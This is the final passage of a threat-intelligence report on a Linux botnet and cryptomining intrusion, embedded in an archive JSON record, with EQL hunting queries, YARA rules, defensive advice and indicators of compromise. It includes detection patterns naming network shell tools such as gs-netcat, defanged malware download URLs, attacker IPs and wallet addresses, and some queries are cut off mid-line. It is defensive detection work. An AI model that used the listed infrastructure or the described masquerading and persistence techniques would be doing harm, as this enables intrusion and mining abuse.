PKEXEC Exploitation\r\nPotential SSH-IT SSH Worm Downloaded\r\nScheduled Job Executing Binary in Unusual Location\r\nThe following YARA Signatures are in place to detect the KAIJI and RUDEDEVIL malware samples both as file and in-memory:\r\nLinux.Generic.Threat\r\nLinux.Hacktool.Flooder\r\nThe following, soon to be released, endpoint rule alerts were observed throughout the analysis of this intrusion set:\r\nPotential Shell via Web Server\r\nPotential Web Server Code Injection\r\nPotential Shell Executed by Web Server User\r\nDecode Activity via Web Server\r\nLinux Telegram API Request\r\nSuspicious Echo Execution\r\nHunting queries in Elastic\r\nThe events for both KQL and EQL are provided with the Elastic Agent using the Elastic Defend integration. Hunting queries\r\ncould return high signals or false positives. These queries are used to identify potentially suspicious behavior, but an\r\ninvestigation is required to validate the findings.\r\nEQL queries\r\nUsing the Timeline section of the Security Solution in Kibana under the “Correlation” tab, you can use the below EQL\r\nqueries to hunt for behaviors similar:\r\nPotential XMRIG Execution\r\nThe following EQL query can be used to hunt for XMRIG executions within your environment.\r\nprocess where event.type == \"start\" and event.action == \"exec\" and (\r\n (\r\n process.args in (\"-a\", \"--algo\") and process.args in (\r\n \"gr\", \"rx/graft\", \"cn/upx2\", \"argon2/chukwav2\", \"cn/ccx\", \"kawpow\", \"rx/keva\", \"cn-pico/tlo\", \"rx/sfx\", \"rx/arq\",\r\n \"rx/0\", \"argon2/chukwa\", \"argon2/ninja\", \"rx/wow\", \"cn/fast\", \"cn/rwz\", \"cn/zls\", \"cn/double\", \"cn/r\", \"cn-pico\",\r\n \"cn/half\", \"cn/2\", \"cn/xao\", \"cn/rto\", \"cn-heavy/tube\", \"cn-heavy/xhv\", \"cn-heavy/0\", \"cn/1\", \"cn-lite/1\",\r\n \"cn-lite/0\", \"cn/0\"\r\n )\r\n ) or\r\n (\r\n process.args == \"--coin\" and process.args in (\"monero\", \"arqma\", \"dero\")\r\n )\r\n) and process.args in (\"-o\", \"--url\")\r\nMSR Write Access Enabled\r\nXMRIG leverages modprobe to enable write access to MSR. This activity is abnormal, and should not occur by-default.\r\nprocess where event.type == \"start\" and event.action == \"exec\" and process.name == \"modprobe\" and\r\nprocess.args == \"msr\" and process.args == \"allow_writes=on\"\r\nPotential GSOCKET Activity\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 21 of 26\n\nThis activity is default behavior when deploying GSOCKET through the recommended deployment methods. Additionally,\r\nseveral arguments are added to the query to decrease the chances of missing a more customized intrusion through\r\nGSOCKET.\r\nprocess where event.type == \"start\" and event.action == \"exec\" and\r\nprocess.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and\r\nprocess.command_line : (\r\n\"*GS_ARGS=*\", \"*gs-netcat*\", \"*gs-sftp*\", \"*gs-mount*\", \"*gs-full-pipe*\", \"*GS_NOINST=*\", \"*GSOCKET_ARGS=*\", \"*GS_DSTDIR=*\r\n)\r\nPotential Process Masquerading via Exec\r\nGSOCKET leverages the exec -a method to run a process under a different name. GSOCKET specifically leverages\r\nmasquerades as kernel processes, but other malware may masquerade differently.\r\nprocess where event.type == \"start\" and event.action == \"exec\" and\r\nprocess.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and process.args == \"-c\" and process.command_l\r\nRenice or Ulimit Execution\r\nSeveral malwares, including KAIJI and RUDEDEVIL, leverage the renice utility to change the priority of processes or set\r\nresource limits for processes. This is commonly used by miner malware to increase the priority of mining processes to\r\nmaximize the mining performance.\r\nprocess where event.type == \"start\" and event.action == \"exec\" and (\r\n process.name in (\"ulimit\", \"renice\") or (\r\n process.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and process.args == \"-c\" and\r\n process.command_line : (\"*ulimit*\", \"*renice*\")\r\n )\r\n)\r\nInexistent Cron(d) Service Started\r\nBoth KAIJI and RUDEDEVIL establish persistence through the creation of a cron(d) service in /etc/init.d/cron(d) .\r\nCron , by default, does not use a SysV Init service. Execution of a cron(d) service is suspicious, and should be\r\nanalyzed further.\r\nprocess where event.type == \"start\" and event.action == \"exec\" and\r\n process.name == \"systemctl\" and process.args == \"start\" and process.args in\r\n (\"cron.service\", \"crond.service\", \"cron\", \"crond\")\r\nSuspicious /etc/ Process Execution from KAIJI\r\nThe /etc/ directory is not a commonly used directory for process executions. KAIJI is known to place a binary called\r\n32678 and id.services.conf in the /etc/ directory, to establish persistence and evade detection.\r\nprocess where event.type == \"start\" and event.action == \"exec\" and (process.executable regex \"\"\"/etc/[0-9].*\"\"\" or proces\r\nHidden File Creation in /dev/ directory\r\nCreating hidden files in /dev/ and /dev/shm/ are not inherently malicious, however, this activity should be uncommon.\r\nKAIJI, GSOCKET and other malwares such as K4SPREADER are known to drop hidden files in these locations.\r\nfile where event.type == \"creation\" and file.path : (\"/dev/shm/.*\", \"/dev/.*\")\r\nSuspicious Process Execution from Parent Executable in /boot/\r\nMalwares such as KAIJI and XORDDOS are known to place executable files in the /boot/ directory, and leverage these to\r\nestablish persistence while attempting to evade detection.\r\nprocess where event.type == \"start\" and event.action == \"exec\" and process.parent.executable : \"/boot/*\"\r\nYARA\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 22 of 26\n\nElastic Security has created YARA rules to identify this activity. Below is the YARA rule to identify the custom Apache2\r\nmalware:\r\nrule Linux_Trojan_Generic {\r\n meta:\r\n author = \"Elastic Security\"\r\n creation_date = \"2024-09-20\"\r\n last_modified = \"2024-09-20\"\r\n os = \"Linux\"\r\n arch = \"x86\"\r\n threat_name = \"Linux.Trojan.Generic\"\r\n reference = \"https://www.elastic.co/security-labs/betting-on-bots\"\r\n license = \"Elastic License v2\"\r\n strings:\r\n $enc1 = { 74 73 0A 1C 1A 54 1A 11 54 0C 18 43 59 5B 3A 11 0B 16 14 10 0C 14 5B }\r\n $enc2 = { 18 1A 1A 1C 09 0D 43 59 0D 1C 01 0D 56 11 0D 14 15 55 18 09 09 15 10 }\r\n $enc3 = { 18 1A 1A 1C 09 0D 54 15 18 17 1E 0C 18 1E 1C 43 59 0B 0C }\r\n $enc4 = { 34 16 03 10 15 15 18 56 4C 57 49 59 51 2E 10 17 1D 16 0E 0A 59 37 }\r\n $key = \"yyyyyyyy\"\r\n condition:\r\n 1 of ($enc*) and $key\r\n}\r\nTo detect GSOCKET, including several of its adjacent tools, we created the following signature:\r\nrule Multi_Hacktool_Gsocket {\r\n meta:\r\n author = \"Elastic Security\"\r\n creation_date = \"2024-09-20\"\r\n last_modified = \"2024-09-23\"\r\n os = \"Linux, MacOS\"\r\n arch = \"x86\"\r\n threat_name = \"Multi.Hacktool.Gsocket\"\r\n reference = \"https://www.elastic.co/security-labs/betting-on-bots\"\r\n license = \"Elastic License v2\"\r\n strings:\r\n $str1 = \"gsocket: gs_funcs not found\"\r\n $str2 = \"/share/gsocket/gs_funcs\"\r\n $str3 = \"$GSOCKET_ARGS\"\r\n $str4 = \"GSOCKET_SECRET\"\r\n $str5 = \"GS_HIJACK_PORTS\"\r\n $str6 = \"sftp -D gs-netcat\"\r\n $str7 = \"GS_NETCAT_BIN\"\r\n $str8 = \"GSOCKET_NO_GREETINGS\"\r\n $str9 = \"GS-NETCAT(1)\"\r\n $str10 = \"GSOCKET_SOCKS_IP\"\r\n $str11 = \"GSOCKET_SOCKS_PORT\"\r\n $str12 = \"gsocket(1)\"\r\n $str13 = \"gs-sftp(1)\"\r\n $str14 = \"gs-mount(1)\"\r\n condition:\r\n 3 of them\r\n}\r\nFinally, the following signature was written to detect the open source Ligolo-ng tool, as we have reason to believe this tool\r\nwas used during this intrusion.\r\nrule Linux_Hacktool_LigoloNG {\r\n meta:\r\n author = \"Elastic Security\"\r\n creation_date = \"2024-09-20\"\r\n last_modified = \"2024-09-20\"\r\n os = \"Linux\"\r\n arch = \"x86\"\r\n threat_name = \"Linux.Hacktool.LigoloNG\"\r\n reference = \"https://www.elastic.co/security-labs/betting-on-bots\"\r\n license = \"Elastic License v2\"\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 23 of 26\n\nstrings:\r\n $a = \"https://github.com/nicocha30/ligolo-ng\"\r\n $b = \"@Nicocha30!\"\r\n $c = \"Ligolo-ng %s / %s / %s\"\r\n condition:\r\n all of them\r\n}\r\nDefensive recommendations\r\nTo effectively defend against malware campaigns and minimize the risk of intrusion, it’s crucial to implement a multi-layered approach to security. Here are some key defensive measures you should prioritize:\r\n1. Keep Your Elastic Detection Rules Updated and Enabled: Ensure that your security tools, including any pre-built\r\ndetection rules, are up to date. Continuous updates allow your systems to detect the latest malware signatures and\r\nbehaviors.\r\n2. Enable Prevention Mode in Elastic Defend: Configure Elastic Defend in prevention mode to automatically block\r\nknown threats rather than just alerting on them. Prevention mode ensures proactive defense against malware and\r\nexploits.\r\n3. Monitor Alerts and Logs: Regularly monitor alerts, logs, and servers for any signs of suspicious activity. Early\r\ndetection of unusual behavior can help prevent a small breach from escalating into a full-blown compromise.\r\n4. Conduct Threat Hunting: Proactively investigate your environment for hidden threats that may have evaded\r\ndetection. Threat hunting can uncover advanced attacks and persistent malware that bypass traditional security\r\nmeasures.\r\n5. Implement Web Application Firewalls (WAFs): Use a WAF to block unauthorized or malicious traffic. A properly\r\nconfigured firewall can prevent many common web attacks.\r\n6. Enforce Strong Authentication for SSH: Use public/private key authentication for SSH access to protect against\r\nbrute force attacks.\r\n7. Write Secure Code: Ensure that all custom software, especially web server technology, follows secure coding\r\npractices. Engaging professional security auditors to review your code can help identify and mitigate vulnerabilities\r\nbefore they are exploited.\r\n8. Regularly Patch and Update Systems: Keeping servers, applications, and software up to date is essential to\r\ndefending against known vulnerabilities. Prompt patching minimizes the risk of being targeted by off-the-shelf\r\nexploits.\r\nBy following these recommendations, you can significantly reduce the attack surface and strengthen your defense against\r\nongoing or potential malware threats.\r\nObservations\r\nThe following observables were discussed in this research. These are available for download in STIX or ECS format here.\r\nObservable Type N\r\n72ac2877c9e4cd7d70673c0643eb16805977a9b8d55b6b2e5a6491db565cee1f\r\nSHA-256\r\nSy\r\n82c55c169b6cb5e348be6e202163296b2b5d80fff2be791c21da9a8b84188684\r\nSHA-256\r\nap\r\n0fede7231267afc03b096ee6c1d3ded479b10ab235e260120bc9f68dd1fc54dd\r\nSHA-256\r\nap\r\n9ee695e55907a99f097c4c0ad4eb24ae5cf3f8215e9904d787817f1becb9449e\r\nSHA-256\r\ndo\r\n1cdfb522acb1ad0745a4b88f072e40bf9aa113b63030fe002728bac50a46ae79\r\nSHA-256\r\nlin\r\nd0ef2f020082556884361914114429ed82611ef8de09d878431745ccd07c06d8\r\nSHA-256\r\nlin\r\nad36cf59b5eb08799a50e9aece6f12cdfe8620062606ac6684d3b4509acc681b\r\nSHA-256\r\nlin\r\n792a84a5bc8530285e2f6eb997054edb3d43460a99a089468e2cf81b5fd5cde6\r\nSHA-256\r\nlin\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 24 of 26\n\nObservable Type N\r\ne19fb249db323d2388e91f92ff0c8a7a169caf34c3bdaf4d3544ce6bfb8b88b4\r\nSHA-256\r\nlin\r\n3847c06f95dd92ec482212116408286986bb4b711e27def446fb4a524611b745\r\nSHA-256\r\nlin\r\nfffee23324813743b8660282ccd745daa6fb058f2bf84b9960f70d888cd33ba0\r\nSHA-256\r\nlin\r\n6d40b58e97c7b4c34f7b5bdac88f46e943e25faa887e0e6ce5f2855008e83f55\r\nSHA-256\r\nlin\r\n0c3442b8c49844a1ee41705a9e4a710ae3c7cde76c69c2eab733366b2aa34814\r\nSHA-256\r\nlin\r\n310973f6f186947cb7cff0e7b46b4645acdd71e90104f334caa88a4fa8ad9988\r\nSHA-256\r\nlin\r\n0d24a2e7da52bad03b0bda45c8435a29c4e1c9b483e425ae71b79fd122598527\r\nSHA-256\r\nlin\r\n36fc8eef2e1574e00ba3cf9e2267d4d295f6e9f138474e3bd85eb4d215f63196\r\nSHA-256\r\nlin\r\n3c25a4406787cc5089e83e00350e49eb9f192d03d69e7a61b780b6828db1344f\r\nSHA-256\r\nlin\r\n7c16149db7766c6fd89f28031aa123408228f045e90aa03828c02562d9f9d1d7\r\nSHA-256\r\nlin\r\n09f935acbac36d224acfb809ad82c475d53d74ab505f057f5ac40611d7c3dbe7\r\nSHA-256\r\nl6\r\nea0068702ea65725700b1dad73affe68cf29705c826d12a497dccf92d3cded46\r\nSHA-256\r\nl6\r\n160f232566968ade54ee875def81fc4ca69e5507faae0fceb5bef6139346496a\r\nSHA-256\r\nl6\r\n89b60cedc3a4efb02ceaf629d6675ec9541addae4689489f3ab8ec7741ec8055\r\nSHA-256\r\nl6\r\n20899c5e2ecd94b9e0a8d1af0114332c408fb65a6eb3837d4afee000b2a0941b\r\nSHA-256\r\nl8\r\n728dce11ffd7eb35f80553d0b2bc82191fe9ff8f0d0750fcca04d0e77d5be28c\r\nSHA-256\r\nl8\r\n47ceca049bfcb894c9a229e7234e8146d8aeda6edd1629bc4822ab826b5b9a40\r\nSHA-256\r\nl8\r\ne89f4073490e48aa03ec0256d0bfa6cf9c9ac6feb271a23cb6bc571170d1bcb5\r\nSHA-256\r\nl8\r\nd6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60\r\nSHA-256\r\nhj\r\n54a5c82e4c68c399f56f0af6bde9fb797122239f0ebb8bcdb302e7c4fb02e1de\r\nSHA-256\r\nm\r\n9e32be17b25d3a6c00ebbfd03114a0947361b4eaf4b0e9d6349cbb95350bf976\r\nSHA-256\r\nvd\r\nhttp://gcp.pagaelrescate[.]com:8080/ifindyou url ifi\r\nhttp://gcp.pagaelrescate[.]com:8080/cycnet url cy\r\nhttp://gcp.pagaelrescate[.]com:8080/testslot/enviador_slot url En\r\nhttp://gcp.pagaelrescate[.]com:8080/t9r/SystemdXC url Sy\r\nhttp://38.54.125[.]192:8080/nginx-rc url ng\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 25 of 26\n\nObservable Type N\r\nhttp://62.72.22[.]91/apache2 url ap\r\nhttp://62.72.22[.]91/apache2v86 url ap\r\nhttp://91.92.241[.]103:8002/gk.php url gk\r\nhttp://hfs.t1linux[.]com:7845/scdsshfk url sc\r\ngcp.pagaelrescate[.]com\r\ndomain-name\r\nnishabii[.]xyz\r\ndomain-name\r\n3.147.53[.]183\r\nipv4-\r\naddr\r\n38.54.125[.]192\r\nipv4-\r\naddr\r\n107.178.101[.]245\r\nipv4-\r\naddr\r\n62.72.22[.]91\r\nipv4-\r\naddr\r\n91.92.241[.]103\r\nipv4-\r\naddr\r\n61.160.194[.]160\r\nipv4-\r\naddr\r\n41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL\r\nXMR\r\nWallet\r\n42CJPfp1jJ6PXv4cbjXbBRMhp9YUZsXH6V5kEvp7XzNGKLnuTNZQVU9bhxsqBEMstvDwymNSysietQ5VubezYfoq4fT4Ptc\r\nXMR\r\nWallet\r\n1CSUkd5FZMis5NDauKLDkcpvvgV1zrBCBz\r\nBTC\r\nWallet\r\nReferences\r\nThe following were referenced throughout the above research:\r\nhttps://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html\r\nhttps://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/\r\nhttps://www.fortinet.com/blog/threat-research/multiple-threats-target-adobe-coldfusion-vulnerabilities\r\nhttps://www.aquasec.com/blog/lucifer-ddos-botnet-malware-is-targeting-apache-big-data-stack/\r\nhttps://github.com/hackerschoice/gsocket\r\nSource: https://www.elastic.co/security-labs/betting-on-bots\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 26 of 26",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.elastic.co/security-labs/betting-on-bots"
	],
	"report_names": [
		"betting-on-bots"
	],
	"threat_actors": [],
	"ts_created_at": 1775791241,
	"ts_updated_at": 1775791338,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/21255dabf13b81070819344ae2b82e9d6ebe0573.pdf",
		"text": "https://archive.orkl.eu/21255dabf13b81070819344ae2b82e9d6ebe0573.txt",
		"img": "https://archive.orkl.eu/21255dabf13b81070819344ae2b82e9d6ebe0573.jpg"
	}
}